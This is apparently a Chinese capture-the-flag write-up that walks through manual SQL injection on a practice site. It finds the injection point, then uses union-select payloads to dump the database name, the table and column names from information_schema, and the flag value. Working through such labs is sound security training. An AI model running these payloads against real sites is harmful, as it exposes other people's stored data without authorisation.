进去判断是否有注入点
我们输入1和2都会出现回显存 但是输入3后显示无回显
判断是存在注入点
加引号号
这里输入3'的sql语句是,显示无法查询到东西无回显,判断存在注入点
这里我是用手工测试注入也可以使用sqlmap测试
这里我使用传统的方法直接开注
从上面我们得知有两个回显位置,下面开始:暴库名
' ' union select 1,database() #
爆出库名'sqli',接下来开始爆表名
' ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
爆出表明有 flag,news两个,这边我们要flag就直接去flag表,开始判断字段名
' ' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
判断出存在flag字段,接下来就简单了直接一个SQL语句就可以了
' ' union select 1,flag from flag #
这样就拿到我们的flag了